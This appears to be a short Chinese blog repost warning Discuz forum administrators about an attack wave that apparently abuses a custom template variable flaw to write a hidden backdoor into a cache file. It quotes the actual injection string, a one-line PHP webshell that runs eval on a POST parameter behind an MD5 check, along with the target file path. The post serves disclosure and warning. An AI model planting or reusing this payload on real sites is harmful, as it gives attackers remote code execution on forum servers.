Discuz 3rd Party攻击第三波出现了

[tag]discuz[/tag]

来自MIAO'BLOG：http://www.mhack.cn/archives/2071

不知道又是哪个同学的杰作 初步预测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门

[quote]
自定义模板变量:
变 量 : {’,”);ECHO ”;$X=SUBSTR(MD5($_GET['B']),28);IF($X==’7aaa’)EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa
/forumdata/cache/usergroup_0.php
[/quote]

[code]

对post的变量b进行md5加密，如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
[/code]

这个验证很YD啊。。

估计最近很多大站被黑都是出自这个东东吧～

使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件

PS：确实强大，本人以亲自测试。